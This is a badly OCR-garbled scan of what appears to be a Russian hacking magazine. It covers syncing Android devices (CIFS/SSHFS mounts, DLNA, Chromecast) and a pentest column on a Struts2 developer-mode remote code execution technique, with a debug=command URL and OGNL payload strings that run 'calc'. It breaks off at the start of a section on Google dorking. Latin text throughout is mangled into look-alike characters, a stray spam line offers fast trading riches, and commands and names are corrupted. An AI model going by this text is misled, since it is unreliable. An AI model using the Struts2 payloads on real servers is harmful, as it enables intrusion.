дить общую идею (синхронизация идет в обе сто- 
роны). Проблема только в том, что у собеседника 
тоже должен быть І_6 Оріітиз Ѵи, а вероятность 
этого довольно низка. 

К счастью, в Соодіе есть приложение с ам- 
бициозным названием ЗупсЗрасе ЗИагесІ 
ѴѴИгІеЬоагеІ. По сути, тот же разделяемый Раіпі, 
за исключением того, что для установления связи 
между устройствами одного звонка будет недо- 
статочно и придется отправить также ссылку. Зато 
работает везде и все, включая тот же Орйплиз Ѵи. 

Пользоваться приложением просто, но ин- 
терфейс у него не очевиден. Нужно сделать сле- 
дующее: установить софтину, запустить, открыть 
меню, выбрать пункт «Зупсіпд...», а затем нажать 
«Зіагі Зупсіпд». После этого нужно снова открыть 
меню, опять выбрать «Зупсіпд...», а далее нажать 
либо «ЕплаіІ Зупс Ыпк...», либо «Сору Зупс 1_іпк» — 
и все. На другой стороне достаточно будет от- 
крыть ссылку, и приложение будет запущено ав- 
томатически. 

ИНТЕЛЛЕКТУАЛЬНАЯ РЕГУЛИРОВКА 
ГРОМКОСТИ 

Во многих прошивках, в том числе кастомных, 
есть две любимые пользователями функции. 
Это автоматическое включение беззвучного ре- 
жима при перевороте устройства экраном вниз 
и возможность задать интервалы тихого време- 
ни, когда смартфон не будет издавать звуки. Это 
определенно полезная функциональность, кото- 
рой почему-то нет в обычном АпсІгоісІ. К счастью, 
ситуацию легко исправить с помощью сторонних 
приложений. 

Лучшее из лучших среди приложений для вы- 
полнения подобных задач и всего, что связано 



с автоматизацией АпсІгоісІ, — это Тазкѳг. Это ин- 
струмент, который позволяет назначать те или 
иные действия в ответ на произошедшее собы- 
тие (время, место, включение ѴѴі-Рі, что угодно), 
но так как Тазкег достаточно сложен в использо- 
вании и с наскоку в нем не разобраться, то я от- 
правлю тебя прочитать большую статью об этом 
инструменте, которая уже была опубликована 
в нашем журнале, а вместо него расскажу о про- 
стых в использовании приложениях, которые де- 
лают ровно то, что нам нужно. 

Первое приложение — Р1ір43ііелсе. Это про- 
стой сервис, который реагирует на изменение 
показаний датчика положения и отключает звук 
при перевороте смартфона экраном вниз. В каче- 
стве дополнения приложение также умеет приглу- 
шать звук звонка, когда телефон будет взят в руки. 
Это тоже очень удобная и полезная функциональ- 
ность. 

Второе приложение — Аи1:о ѴіЬгаІе. Приложе- 
ние с двойной функциональностью. Позволяет 
отключать звук не только в определенные часы, 
но и в определенном месте. То есть можно, на- 
пример, настроить приложение так, чтобы оно от- 
ключало звук на работе или в кинотеатре. Но это 
только в теории, на практике же СРЗ в помеще- 
ниях может просто не сработать, так что всецело 
полагаться на приложение не стоит. 

ЗАКЛЮЧЕНИЕ 

Конечно же, это не все фирменные функции, ко- 
торые можно найти в прошивках тех или иных про- 
изводителей смартфонов. За кадром остались 
камера-комбайн с огромным количеством бес- 
полезных функций от Затзипд, заметки поверх 
экрана от І_0, функция приближения видео в пле- 
ере от Затзипд и ИЗ, Зтагі; Аеііопз от МоШгоІа 
и многие другие. Большинство этих функций тебе 
никогда не понадобятся, а вот те, которые попали 
в статью, будут весьма полезны. НС 












Обеспечиваем слаженную работу нескольких АпйгоШ-девайсов 

Сегодня мобильный гаджет — это уже не роскошь и не игрушка гика, назначение которой из- 
вестно только ему самому, а такая же обычная вещь, как телевизор или микроволновка. Боль- 
шинство из нас владеют не только смартфоном, но и планшетом, ноутбуком, портативной 
игровой приставкой, а у многих есть умные НРМІ-стики под управлением АпсІгоісІ. Проблема 
всего этого многообразия только в том, что в мобильных ОС нет средств для синхронизации 
и удаленного взаимодействия множества устройств. 



ВМЕСТО ВВЕДЕНИЯ 

Ѳоодіе и Арріе сделали многое для того, чтобы их 
девайсами пользоваться было настолько удобно, 
насколько это возможно. Единый аккаунт для до- 
ступа к сервисам, прозрачная синхронизация 
данных, облачное хранилище для настроек — это 
только часть реализованных софтверными гиган- 
тами функций, которые делают гаджеты чрез- 
вычайно удобными в использовании и экономят 
уйму времени. 

Тем не менее, когда речь заходит о синхро- 
низации нескольких устройств между собой, 
возникают серьезные проблемы. Ни в одной 
ОС просто нет такой функциональности. Конечно, 
мы можем привязать все устройства к единому 
Ѳоодіе- и Арріе-аккаунту, который позволит нам 
устанавливать последние версии софта, полу- 
чать письма, сообщения и другие уведомления 
сразу на все девайсы, Однако ни о какой синхро- 
низации настроек, списков установленных при- 
ложений и данных на карте памяти речи не идет, 
каждое устройство — это «вещь в себе», которая 
может иметь доступ к одному облаку-хранилищу, 
но не более того. 

Мы не будем разбираться, почему сложилась 
такая ситуация, а вместо этого обсудим способы 
решения проблемы, то есть попытаемся найти 
инструменты и модификации, которые помогли 



бы нам настроить синхронизацию и взаимодей- 
ствие различных устройств. АпбгоісІ-устройства 
разного назначения в наших широтах распро- 
странены гораздо сильнее Ю5, поэтому речь пой- 
дет о зеленом роботе. 

ЧТОКЧЕМУ 

Когда мы говорим «синхронизация нескольких 
устройств», то чаще всего имеем в виду смартфон 
и планшет, именно эти два устройства пользуют- 
ся наибольшей популярностью. Однако, кроме 
них, на рынке существует масса других АпбгоісІ- 
девайсов, включая умные телевизоры, набрав- 
шие популярность китайские НЮМІ-донглы, а так- 
же более экзотические вещи, такие как игровая 
приставка ОІІѴА и карманная консоль ЫѴЮІА 
ЗИіеІсІ. 

Лично у меня имеется в общей сложности 
шесть различных Апбгоіб-девайсов, из кото- 
рых я ежедневно пользуюсь тремя и еще одним 
как минимум несколько раз в неделю. Это смарт- 
фон, планшет, игровая консоль и НОМІ-донгл. 
Устройства, как видно, сильно разнятся по на- 
значению, функциональности, а также установ- 
ленным версиям АпсІгоісі. Поэтому задача их 
синхронизации и взаимодействия была довольно 
нетривиальной, требовалось обеспечить общий 
доступ всех устройств к файловому хранилищу, 



синхронизацию приложении между нужными де- 
вайсами, сделать из смартфона универсальный 
пульт управления, а также поднять ѳиМА-сервер, 
с которого все устройства могли тянуть мультиме- 
диафайлы. 

ДАННЫЕ ПРИЛОЖЕНИЙ 

Первое, что следует сделать, — это организовать 
синхронизацию настроек и данных приложений 
между устройствами. По сути, это главная пробле- 
ма, которая содержит в себе наибольшее количе- 
ство подводных камней. Дело в том, что в АпсІгоісі 
сделать синхронизацию настроек и данных при- 
ложений далеко не так просто, как в классических 
настольных ОС. Если в той же ѴѴіпбоѵѵз или Упих 
достаточно просто скопировать файлы и каталоги 
настроек приложения на другую машину, то здесь 
мы, во-первых, столкнемся с проблемой раз- 
граничения прав, которая не позволяет одному 
приложению получить доступ к данным другого, 
а во-вторых, можем получить проблему несовме- 
стимости устройств между собой. 

По причине первого ограничения синхрони- 
зация настроек приложений возможна только 
при наличии прав гоо"1 на обоих устройствах, 
по причине второго не обойтись без специали- 
зированных инструментов, которые могут испра- 
вить проблемы в случае их возникновения. Все- 
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Состояние синхронизации 

Последний запуск 2013-09-21 15:47:16 
Завершение 2013-09’21 15:50:01 
Длительность 1 64 секунд 
Состояние ЗАВЕРШЕНО 
Следующий запуск 2013-09-21 16:50:01 

Загружено 1 файл / 2.9 МВ 
Скачано 48 файлов / 1 5,2 мв 
Удалено локально 0 файлов 
Удалено е ОгорЬох 1 файл 



ОгорЬох аккаунт 

Ётаіі 2 оЬпіп@дгпэіі.сот 
Всего 4.50 СВ 

Использовано 1 .45 6В (32%) 
Расшарено 0 (0%) 

Свободно 3.05 СВ (68%) 



Узнайте как торговать 40000$, имея 100$, о 
Н ажмите здесь и мы вам все покажем! 




Две очереди в ОаіаЗупс 



ОаіаБупс: выбираем приложения 



Огорвупс закончил очередную син- 
хронизацию 



Включаем автозагрузку модуля 
сіТз.ковСіТзМападег 



го существует два типа инструментов, которые 
нам подойдут, это приложения для бэкапа типа 
Тііапіит Васкир и Неііит, а также специализи- 
рованные приложения для синхронизации, вро- 
де ОаІаЗупс и АррЗупс. Преимущество первых 
в асинхронности работы: скопировал настройки 
сегодня, восстановил на другом девайсе завтра. 
Преимущество вторых в возможности настройки 
синхронизации по времени, например каждую 
ночь. 

К счастью, есть инструмент, который сочета- 
ет в себе достоинства обоих подходов. ОаІаЗупс 
не только умеет копировать настройки приложе- 
ний и файлы на карте памяти на любой девайс 
в той же локальной сети, но и позволяет делать 
бэкап в ОгорЬох или Вох.сот, а в качестве допол- 
нения имеет поддержку ВІиеіооІЬ и МРС, которая 
пригодится в дороге. 

Алгоритм использования ОаІаЗупс следую- 
щий. Устанавливаем приложение на все устрой- 
ства, которые должны участвовать в синхрони- 
зации, запускаем его. Далее на том устройстве, 
которое должно принять или передать свои на- 
стройки другому, выбираем нужные приложения 
и файлы. Все они будут добавлены в очередь 
(СЗиеие), получить доступ к которой можно, вы- 
двинув панель снизу. После этого нажимаем 
на иконку синхронизации сверху (две стрелки) 
и выбираем нужное устройство из списка. Тап 
по устройству откроет диалог выбора типа син- 
хронизации: в обе стороны (возможность доступ- 
на только в платной версии), туда или сюда. После 
выбора начнется процесс синхронизации. 

Само собой разумеется, что каждый раз за- 
пускать приложение и включать синхронизацию 
не самое интересное занятие, поэтому в ОаІаЗупс 
есть возможность настроить синхронизацию 
по расписанию. Для этого достаточно сохранить 
очередь с помощью иконки дискеты вверху экра- 
на, затем долго удерживать палец на ее имени 
в списке и выбрать в меню пункт ЗсЬебиІе Оиеие. 
Так ты получишь возможность настроить вы- 
борочную синхронизацию нужных приложений 
на разных устройствах. 

По принципу своей работы ОаІаЗупс — это 
типичный бэкапер. Он берет пакет с приложе- 
нием, затем копирует все его настройки и фай- 
лы и отправляет на удаленное устройство. По- 
этому он может быть также использован для: 



а) собственно бэкапа приложений, б) установ- 
ки нужных приложений вместе с настройками 
на новое/перепрошитое устройство с другого 
устройства и в) для асинхронной синхронизации: 
одно устройство сохраняет в ОгорЬох, другое 
(другие) — восстанавливает. 

ФАЙЛЫ 

Кроме синхронизации приложений, Эа^аЗупс 
вполне можно использовать для обмена файлами 
между девайсами. В случае редких копирований 
небольших объемов данных (книги, например) 
его возможностей будет вполне достаточно, а вот 
если речь идет о постоянных синхронизациях 
файлов в обе стороны, а также о доступе к боль- 
шим хранилищам данных (домашний медиаар- 
хив), ОаІаЗупс не подойдет. 

После множества экспериментов с разны- 
ми утилитами синхронизации я пришел к вы- 
воду, что наиболее удобны ШзМападег, по- 
зволяющий подключать ЗМВ-диски к любому 
каталогу на карте памяти (видим всем прило- 
жениям), ЗЗНРЗАпсІгоісІ, подключающий шары 
по протоколу 35Н, и ОгорЗупс, который автомати- 
чески синхронизирует указанный каталог с дис- 
ком ОгорЬох. 

В отличие от многих других 5МВ-, 35Н- 
и ОгорЬох- клиентов, которые можно найти в мар- 
кете, эти три приложения не ограничивают до- 
ступ к шарам только через себя, а вместо этого 
монтируют их к общедоступным каталогам, так 



что сданными можно работать из любой програм- 
мы. Сі^зМападег и ЗЗНРЗАпсІгоісІ удобно исполь- 
зовать для доступа к домашней файлопомойке; 
подключаем сетевой диск и работаем с файлами, 
как с локальными (правда, медиасервер их ин- 
дексировать не будет). 

ОгорЗупс идеально подходит для синхрониза- 
ции небольших объемов данных между разными 
устройствами и ПК: чтобы, например, распро- 
странить электронную книгу на все устройства, 
достаточно скачать ее на ноутбук и положить ку- 
да-нибудь в -/Огорбох/Воокз, буквально через 
несколько секунд она появится на всех девайсах 
с установленным и настроенным ОгорЗупс. И ни- 
какой зависимости от локальной сети и интернет- 
соединения как такового (синхронизация про- 
изойдет, как только появится доступ к сети). 

Теперь о том, как все это настроить. Начнем 
с СКзМападег. Здесь все очень просто и слож- 
но одновременно. С одной стороны, достаточно 
запустить приложение, нажать кнопку «АбсІ Ыеѵѵ 
ЗЬаге...» и в открывшемся окошке вбить адрес 
сервера в формате ІР/имя-шары, указать имя 
юзера:пароль и точку монтирования, например 
/зсісагсі/сііз, создав каталог заранее. Затем нажи- 
маем по сконфигурированной шаре, и она смон- 
тируете я. 

Но это только теория, на практике все не- 
сколько сложнее. По сути, СіІзМападег — это 
всего лишь оболочка для запуска примерно такой 
команды: 



ВЪ 



\ 



МОНТИРОВАНИЕ ВМВ-ШАР 

Чтобы подключить расшаренную ѴѴіпсІоѵѵз- папку, 
нужно выполнить последовательность команд: 

$ ІП5ШОСІ /5о1сапс1/ко/с1п5_ге5о1ѵег. ко 

$ ІП5ГПОСІ /зсІсагсІ/ко/тсІ4, ко 
$ іпзтосі /зсІсагсІ/ко/сі-Рз . ко 
$ іпзтосі /зс!сагс1/ко/пІ5_и1:-Р8. ко 
$ тоипі -і сі-Рз -о іосбагзе1:=и1:-^ 
изегпате=юзер, раззиопсІ=пароль,*-' 
й1е_тосІе=Ѳ777 3 с1іг_тос1е=0777 // ІРА-* 
зИаге /зсісагсі/ сі-Рз 



Ж/Уж л . \ 
мііАіьл 

ГЗДІПДОн 






ЩРО 

Кроме ІІРпР/ОУЧА, ХВМС 
также поддерживает техно- 
логию потокового вещания 
Арріе АігРІау: «Настрой- 
ки — ► Службы — » АігРІау — ► 
Разрешить ХВМС получать 
содержимое АігРІау». 
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Проигрываем локальные файлы 
на внешнем ХВМС-сервере с помо 
щью ВиЬЫеІІРпР 



Панель управления воспроизведени- 
ем в ВиЬЫеІІРпР 



Интерфейс ВиЬЫеІІРпР 



ПКЛетоіеСопігоІ: официальный пульт 
управления для НРМІ-стиков на базе 
чипов ЛК3066 и ВК3166 



$ тоипТ -_Ь сіЕз -о изегпате=юзер. «-■ 
раззілюгс^пароль.біе тос!е=Ѳ777.сІі г «-> 
тос!е=0777 //ІР/имя-шары /зсісагсІ/сіЕз 

Однако она сработает только в том случае, 
если в ядро вшит модуль сііз.ко либо его мож- 
но найти по адресу /зузіет/ІіЬ/сііз.ко. Если это 
не так, файловая система подключена не бу- 
дет, а «не так» это на очень многих смартфонах. 
Что делать, если модуля нет? Здесь два вариан- 
та: либо прошить ядро с поддержкой сііз, либо 
найти/скомпилировать подходящий для своего 
ядра модуль, 

О том, как выбирать и прошивать ядра, у нас 
уже была целая статья, поэтому остановимся 
на втором варианте. В общей сложности, кроме 
модуля сііз.ко, для новых версий АпсІгоісІ нам по- 
надобятся также модули тсІ4.ко, Ьпз_гезоІѵег. 
ко, а также опционально пІз_иіі8.ко, если в шаре 
будут файлы с русскими именами. При этом все 
модули должны быть скомпилированы имен- 
но для той версии ядра Упих, которая прошита 
в девайс. Найти их удастся далеко не для каж- 
дого устройства, но попытаться стоит, исполь- 
зуя поисковые запросы вроде даіаху зЗ сііз.ко. 
Обычно все необходимые модули запакованы 



в один Др -архив, который достаточно развер- 
нуть и скопировать на карту памяти. Далее за- 
ходим в настройки СіізМападег, ставим галочку 
напротив опции 1_оасІ ѵісі іпзтосі, а в поле РаіЬ іо 
сііз.ко перечисляем пути до всех модулей через 
двоеточие, например: /5бсагс1/тс14.ко:/8с1сагс1/ 
сЗпз^езоІѵѳг.коі/збсагЬ/пІЗ-иіів.коузЬсагсІ/сііз. 
ко. После этого программа должна начать нор- 
мально монтировать шары. 

Если же подобные извращения ради воз- 
можности получить доступ шаре тебя совсем 
не радуют, то я хотел бы обратить внимание 
на ЗЗНЕЗАпсІгоісІ, который позволяет монтиро- 
вать удаленные ФС по протоколу 55Н. Фактиче- 
ски это просто обертка вокруг известной файло- 
вой системы пространства пользователя ззЬіз, 
использующая модуль Упих-ядра РУІЗЕ, вклю- 
ченный во все стоковые ядра начиная с АпсІгоісІ 
версии 2.2 (с помощью РУЗЕ в АпсІгоісІ происхо- 
дит монтирование установленных на карту памя- 
ти приложений и виртуальных карт памяти). 

Пользоваться ЗЗНРЗАпсІгоісІ довольно про- 
сто. После запуска главное окно приложе- 
ния будет пусто, за исключением кнопок «+» 
и «Настройки» в верхней части окна. Чтобы 
подключить новую ФС, нажимаем кнопку «+» 



и последовательно заполняем все поля вы- 
веденного на экран меню: ІЧате — произволь- 
ное имя, Нозі — ІР или имя хоста (например, 
192.168.0.100), Нетоіе раіЬ — путь до каталога 
на удаленной стороне (например, /Ьоте/ѵазуа), 
Моипі роіпі — точка монтирования (/зсісагсі/ 
зЬаге), ІІзегпате — имя юзера и РаззѵѵогсІ — па- 
роль соответственно. Далее нажимаем кнопку 
«Сохранить» (пиктограмма в виде дискеты) и, 
вернувшись на главный экран, просто кликаем 
на пункте с именем соединения. После запроса 
прав гооі файловая система будет смонтиро- 
вана к указанному каталогу, с которым можно 
работать с помощью любого файлового менед- 
жера. 

Теперь о ОгорЗупс. По сути, это приложение 
выполняет ту же задачу, что и настольная версия 
ОгорЬох: позволяет хранить файлы на флешке, 
периодически синхронизируя их с облачным 
хранилищем. Синхронизация происходит только 
в отношении изменившихся файлов, а каталоги 
для синхронизации можно выбирать индивиду- 
ально, отправляя и получая из облака только то, 
что реально нужно на смартфоне, без необходи- 
мости качать несколько гигабайт. 

ОгорЗупс очень прост в использовании, надо 
лишь выбрать каталог для синхронизации, ка- 
талог в ОгорЬох и метод синхронизации: в одну 
сторону или в обе. После этого софтина повис- 
нет в фоне и будет периодически копировать 
изменения в файлах на диск ОгорЬох и обрат- 
но. Сразу рекомендую приобрести Рго-версию, 
в ней реализована поддержка Упих-технологии 
іпоТіТу для моментальной синхронизации сразу 
после изменения файлов, а также убрано огра- 
ничение на размер файла в 5 Мб и на один син- 
хронизируемый каталог. 

ДОИР/ОША 

Главная проблема всех перечисленных спосо- 
бов обмена файлами в необходимости полу- 
чения гооі, настройки и даже установки разных 
модулей. В XXI веке, когда смартфоны чуть ли 
не заваривают тебе кофе, это выглядит не- 
сколько архаично. Некоторое время назад была 
придумана технология ІІРпР (ЦіпіѵегзаІ РІид апр 
РІау), которая позволяет соединить все доступ- 




ШРО 

Поддержка стри- 
минга по протоколу 
СЬготесазі есть 
в приложении 
ѴоиТиЬе іог Ооодіе 
ТѴ. Для активации 
выбираем в меню 
пункт Раіг \л/ІФ 
тоЫІе Ьеѵісе и сле- 
дуем инструкциям. 
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ные «умные» устройства в общую сеть с воз- 
можностью доступа к различным функциям. 
К сожалению, разработчики софта и операци- 
онных систем недооценили возможности СІРпР, 
и сегодня технология в основном используется 
только для обмена и удаленного проигрыва- 
ния мультимедиафайлов в составе технологии 
эиЧА, которая стала идеологическим наслед- 
ником и расширением СІРпР. Эти две технологии 
(часто они упоминаются как единый стек техно- 
логий) сегодня используются везде, включая 
разные медиапроигрыватели и телевизоры. 
В АпбгоісІ поддержки УРпР/РІФІА как таковой 
нет, но ее можно найти в большом количестве 
мультимедийных приложений, а также специ- 
ализированном софте, вроде ВиЬЫеІІРпР и тор- 
рент-клиентах. 

В своей основе стек УРпР/оиМА базируется 
на классической клиент-серверной модели вза- 
имодействия, в которой сервер выступает в роли 
раздатчика мультимедиаконтента, а клиент полу- 
чает его и проигрывает. Отличие от других техно- 
логий только в том, что каждое устройство здесь 
зачастую носит универсальный характер, высту- 
пая в роли как сервера, так и клиента, а также 
может быть контроллером, который управляет 
остальными устройствами и позволяет опреде- 
лять, что, где и откуда будет проигрываться (хотя 
все зависит от реализации, конечно). 

Такая архитектура в сочетании с автоматиче- 
ским объединением устройств в сеть позволяет 
реализовывать самые разнообразные схемы 
взаимодействия устройств. В нашем случае мы 
можем буквально в несколько тапов сделать так, 
чтобы фильм, хранящийся в памяти планшета, 
начал проигрываться на ЬЮМІ-донгле, используя 
в качестве пульта управления смартфон. А еще 
в несколько тапов — чтобы музыка из донгла за- 
играла на смартфоне. 

Есть три основных АпбгоісІ-приложения, под- 
держивающих ІІРпРДЭиМА. Это ѴРІауег (через 
ѴРіауег иРпР ЭША РІидіп), ХВМС и ВиЬЫеІІРпР. 
Первый позволяет проигрывать контент с эиЧА- 
сервера, второй — раздавать и проигрывать, 
а третий — это комбайн в стиле «все в одном», 
который играет, раздает и управляет другими 
клиентами и серверами. Встроенная поддерж- 
ка клиентского оиЧА есть также в НЮМІ-донглах 



на базе чипов ПосксЬір 3066 и ПосксЬір 3166 (это 
практически любой современный донгл). 

В моей домашней конфигурации, включаю- 
щей в себя ТѴ-приставку 01)УА с подключенным 
жестким диском, а также НЭМІ-донгл, телефон 
и планшет, используются следующие приложе- 
ния: на ОУѴА, которая, кроме воспроизведения 
медиаконтента на телевизоре, также отвечает 
за хранение всех мультимедиаданных, уста- 
новлен ХВМС, в настройках которого включены 
все режимы работы 01_ЫА (Службы — > ЫРпР — ► 
Все опции). На телефон и планшет установлены 
ВиЬЫеІІРпР, І-ЮМІ-стик идет со встроенным кли- 
ентом ЭиЧА. 

Для того чтобы проиграть тот или иной медиа- 
файл на каком-либо устройстве, теперь доста- 
точно запустить ВиЬЫеСІРпР, выбрать на вкладке 
□еѵісез устройство для отображения контента 
(ВЕЫОЕПЕПЗ), в качестве раздатчика контента 
выбрать ХВМС — и все. Далее находишь нужный 
файл в библиотеке (вкладка І_ІВВАРіѴ) и тапаешь 
по нему. В любой момент я могу сменить устрой- 
ство для отображения или раздачи контента, 
и воспроизведение продолжится на нем. Ни- 
каких настроек, никаких ІР-адресов и номеров 
портов. 

СНВОМЕСА8Т 

ЭЦЧА — прекрасная технология, но она не рас- 
считана на стриминг потоков из сети Интернет. 
Другими словами, если мы захотим посмотреть 
видео в ѴоиТиЬе, придется запускать клиент сай- 
та на самом устройстве, хотя гораздо удобнее 
было бы выбрать нужное видео на смартфоне, 
а затем автоматически запустить его на телеви- 
зоре. 

Специально для таких целей Соодіе изобре- 
ла аналог Арріе АігРІау, названный СИготесазі. 
Официально эта технология поддерживается 
только одноименным І-ЮМІ-донглом производ- 
ства самой Соодіе, но протокол оказался на- 
столько прост, что очень скоро энтузиасты его 
разобрали и создали альтернативную реализа- 
цию в составе приложения СЬеарСазІ:. 

Теперь, чтобы превратить любой АпсІгоісІ- 
девайс в СЬготесазТ достаточно установить 
на него приложение СЬеарСазІ из маркета, запу- 
стить и нажать кнопку запуска вверху экрана. По- 



сле этого во всех поддерживающих СИготесазі 
приложениях автоматически появится кнопка 
в форме прямоугольника с логотипом ѴѴі-Н 
в углу. Нажимаем на кнопку, выбираем устрой- 
ство, и видео проигрывается на нем. 

Единственная проблема в том, что в данный 
момент СЬготесазі-стриминг поддержива- 
ют только УоиТиЬе и встроенный медиаплеер, 
но Соодіе обещала добавить поддержку в РІ_ау 
Фильмы, ІЧеШх и несколько других. Над воз- 
можностью стриминга из любых приложений 
работал КизЬ из команды СуаподепМосІ, однако 
Соодіе быстро завернула эту разработку, отклю- 
чив возможность стриминга любым сторонним 
приложениям. 

ПУЛЫ/ДЖОЙСТИК 

Для управления разными ТѴ-приставками, 
НЭМІ-стиками и в некоторых случаях планшетом 
понадобится «удаленный» пульт. Я не предлагаю 
покупать специальные ВІиѳІооІЬ-пульты или обо- 
рудовать девайсы инфракрасными приемника- 
ми, вместо этого превратим в пульт смартфон. 
Из всего многообразия приложений -пультов, 
которые можно найти в Соодіе Ріау, единствен- 
ный достойный вариант — это ЭгоісІМоІе. Клиент 
у него бесплатный, однако за сервер для АпбгоісІ- 
устройства придется заплатить 80 рублей. 

Клиент и сервер находят друг друга и соеди- 
няются в автоматическом режиме, поэтому на- 
страивать ничего не придется. Из инструментов 
управления доступны: тачпад, клавиатура, муль- 
тимедиапульт и джойстик. Последний, кстати, 
особенно интересен тем, что позволяет создать 
маппинг клавиш к точкам на экране управляе- 
мого устройства, так что с его помощью можно 
играть в абсолютно любые игры, даже если они 
не поддерживают джойстик. 

ВЫВОДЫ 

Объединение гаджетов в одну слаженно рабо- 
тающую сеть — непростая задача, и описанные 
в данной статье приемы не идеальны и подойдут 
не всем. Однако пока у нас нет других инстру- 
ментов, и приходится только ждать, когда сама 
Ооодіе или разработчики СуаподепМосІ добавят 
такие возможности в АпбгоісІ. В том, что это прои- 
зойдет, я уверен на 100%, вопрос только когда. Ш-Е 



РгіепсМу пате 
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ШРО 



ЗЗНРЗАпбгоісІ не ра- 
ботает в АпсІгоісІ 4.2, 
однако автор обещает 
исправить проблему 
в ближайшее время. 

Функциональность 
сервера доступна 
только в платной 
версии ВиЬЫебіРпР, 
стоимостью 140 ру- 
блей. 



Для расшаривания 
карты памяти любого 
гаджета можно ис- 
пользовать приложе- 
ние ЗатбаЭтоісІ. Оно 
не требует настройки 
и запускает ЗатЬа- 
сѳрвер автомати- 
чески после старта 
приложения. 



СНеарСазІ на ОУѴА 
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\ѴАІШШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 

Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 




Алексей «бгеепОод» Тюрин, 
ОідііаІ ЗесигЦу 



УДАЛЕННОЕ ИСПОЛНЕНИЕ КОДА (ПСЕ) ДЛЯ $ТР1)Т$2 



РЕШЕНИЕ 

ЗІПЛ52 — это знаменитый очень мощный баѵа-фреймворк. Он очень рас- 
пространен и используется во многих больших веб-порталах, а также во 
многих крупных приложениях (как часть веб-админок). 

Так вот, этим летом там нашли конкретную багу — возможность прово- 
дить 00 ІЧІ_- инъекции, которая, в свою очередь, приводила к тому, что мож- 
но было выполнять произвольный баѵа-код, то есть ПСЕ. Я надеюсь, суть ее 
уже кто-то описывал в предыдущих номерах, например в рубрике «Обзор 
эксплойтов», так что опущу этот момент. 

Бага действительно была конкретная, так как уязвимы были все вер- 
сии 51пЛз2, а обновлялись все небыстро. Это привело к массовым атакам 
на различные порталы. Под нее вроде бы даже червя сделали. Но к тому 
времени, когда ты будешь читать эту статью, думаю, все поуляжется :). 

На самом деле тема с баѵа-фреймворками и со всякими специфически- 
ми инъекциями еще совсем-совсем не исчерпала себя. В том же $1ги1з2 
за последние пару-тройку лет ежегодно находили различные баги, приво- 
дящие к ПСЕ. Меня эта тема тоже интересовала, и, покопав немного, я нат- 
кнулся на достаточно старую «багу». 

Кавычки здесь потому, что баги на самом деле нет. А есть фича (ох 
как я это люблю) 51ги1з2 — возможность запуска сервлета в Оеѵеіортепі 
тобе. Это такой специальный девелоперский режим, который может по- 
мочь в отладке приложения. Насколько я знаю, когда он включен, разработ- 
чику отображаются ошибки приложения через сам портал (а не только пи- 
шутся в лог), а при обработке каждого запроса оно каждый раз подгружает 
разнообразные конфиги, что позволяет настраивать его без повторного де- 
плоя. Как видишь, выглядит вполне удобно, и потому многие им пользуются 
(хотя по умолчанию он отключен). 




Самая интересная, с нашей точки зрения, возможность — напрямую 
и в любом месте передавать 00 N1..- выражения через параметры запроса! 
Мы можем передать параметр беЬид с одним из трех значений: 

• хті — вывод большого количества информации про сервлет и его окру- 
жение; 

• сопзоіе - открытие окошка, через которое можно будет вводить ООІ\ІІ_- 
выражения (такой веб-дебаггер); 

• соттапсі — с этим значением из консоли на сервер передаются ООІ\ІІ_- 
выражения, которые фактически передаются в дополнительном параме- 
тре — ехргеззіоп. 

ЬбТр ://127 .0.0 . 1 : 8080/5бгиІ52-піаі1геабег/Кеёі5'1га'1іоп_іпри1: .*-> 
гіо?беЬи{7=соттапб&ехрге55іоп=о §п1_е хрге 55ІѲп 

Таким образом, мы видим, что беѵеіорег тобе дает нам возможность 
выполнить и произвольный код, так как напрямую обрабатывает ОС!\ІІ_- 
выражения от пользователя :). 

Хотелось бы еще отметить, что в 51тиІ52 все-таки пытаются бороться 
с возможностью через 001ЧІ_ выполнять произвольный баѵа-код. Не буду 
углубляться в подробности, но это происходит совсем не успешно, так ска- 
зать. Так что вот тебе пара «магических строк», которые позволят выполнить 
команду на самой последней версии 5ігиІз2 (2.3.15.1): 

#_тетЬегАссе55=пеы сот . орепзутрНопу . хмогк2 , о§п1 .+-> 

5есигі1:уМетЬегАссе55(1:гие) . <-■ 

(©□ аѵа . 1ап§ . Кип! іте@§ѳЖипб1гпе ( ) . ехес( 1 саіс ' ) 



пеы заѵа Лапе. Ргосе55Виі1бег(пеы *-> 

]аѵа. 1ап§.51:гіпё[]{ 1 саіс ' }) . 5Іаг1:( ) 

Хотя в документации и написано, что беѵеіортепі: тобе стоит всегда 
отключать при выводе продукта в продакшн из-за падения производитель- 
ности, но многие этим пренебрегают (см. следующую задачу). Так что мы 
можем пользоваться этим при проведении пентестов. 

Еще одну интересную особенность я выискал, когда тестил багу локаль- 
но. У 51ги1з2 есть ряд сервлетов-примеров. Так вот, в одном из них по умол- 
чанию включен беѵеіортепі тобе. Какой конкретно, варьируется в зависи- 
мости от версии: либо таіігеабег, либо Ыапк. 



5 іічіі 52 сіеѵеіортепі: тосіе - ПСЕ 
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в 7 



АВТОМАТИЗИРОВАТЬ ГУГЛОХАКИНГ 



РЕШЕНИЕ 

Мы уже не раз касались прекрасных возможностей гугла (и аналогичных 
поисковиков} для поиска всяких разных интересных штук. Нельзя, конеч- 
но, здесь не вспомнить и про прекрасный ресурс Соодіе Маскіпд баіаЬазе 
(ѲНЭВ) ( ѵѵѵѵ\у.ѳхрІоіі-бЬ.сот/аооаІе-сІогкз ). Много различных гуглодорков 
описывают параметры, с помощью которых можно искать уязвимые при- 
ложения, критичную информацию. Гугл позволяет найти тысячи и тысячи 
хостов с большими дырами. 

Например, предыдущая задачка. Пишем простой гуглодорк«іпіііІе: м 5ігиіз 
РгоЫет Нерогі"» и получаем «158,000 гезиііз». Конечно, гугл здесь хва- 
стается и по факту отдельных хостов около 400, но все равно это не меня- 
ет дела — мы можем почти на 100% быть уверены, что там есть ВСЕ, так 
как включен сіеѵеіортепі тосіе. 

Теперь давай посмотрим с другой стороны. Вот проводим мы пентест 
какого-то ресурса. Погуглодоркать нужно? Нужно. И собрать информацию 
нужно. Но делать это через браузер — совсем не наш метод. Нам нужна ав- 
томатизация процесса. 

Варианта здесь, на самом деле, два. Первый — взять тулзу, которая эму- 
лировала бы пользовательские запросы в гугл и парсила бы ответы. Минус 
здесь в том, что гугл не любит ботов и блочит их (капчу надо вводить). Но, 
используя большое количество прокси или отвечая на капчу «китайским ме- 
тодом» (то есть вручную), мы можем слить инфу с гугла. Второй — восполь- 
зоваться АРІ гугла. Есть у него такая фича — Сизіот 5еагсб Епдіпе, к которой 
